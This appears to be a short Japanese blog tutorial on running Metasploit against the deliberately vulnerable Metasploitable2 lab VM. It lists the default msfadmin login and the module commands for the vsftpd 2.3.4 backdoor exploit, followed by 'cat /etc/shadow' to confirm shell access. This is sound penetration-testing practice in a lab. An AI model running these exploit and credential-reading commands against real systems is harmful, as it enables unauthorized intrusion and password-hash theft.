Qiita Teams that are logged in
You are not logged in to any team

Log in to Qiita Team
Community
OrganizationAdvent CalendarQiitadon (β)
Service
Qiita JobsQiita ZineQiita Blog
Help us understand the problem. What is going on with this article?

Metasploitの動作テストにうってつけ、Metasploitableを使ってみた

More than 3 years have passed since last update.

作業の備忘録がてら書いているブログです。
誰かの助けになれば幸いです。


Metasploitableとは

Metasploitは脆弱性をついた攻撃を行うツールで、ペネトレーションテストなどに使われます。
https://ja.wikipedia.org/wiki/Metasploit

Metasploitableは脆弱な状態にセットアップされたVMで、Metasploitのテストを行うためのターゲットとしてすぐに利用することができます。
http://kaworu.jpn.org/security/Metasploitable

Metasploitableのセットアップ

下記のURLからダウンロードし、回答したものをVMware Workstation PlayerやVirtual Boxで開きます。
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
→ユーザアカウントmsfadmin、パスワードmsfadmin
これで、脆弱なVMイメージが稼働している状態となります。
今回はMetasploitable2 というバージョンのものを使っています。

Metasploitableの動作テスト

Kali linuxなどでMetasploitを起動します
image.png

今回はvsftpdの欠陥を利用します(vsftpd_234_backdoorというペイロードをつかいます)

下記のようなコマンドで攻撃を実行します
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 攻撃先のIP
exploit

Command shell session 1 openedと表示され、コマンド入力ができるようになっています。
ifconfigやcat /etc/shadowなどを打ち込み、ターゲットの情報が取得できていることを確認します。

harapeco_nya
えりにゃんです!らぶ横浜! 寝ること食べることが大好きです(≧ω≦) セキュリティも大好きです(≧ω≦)v
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away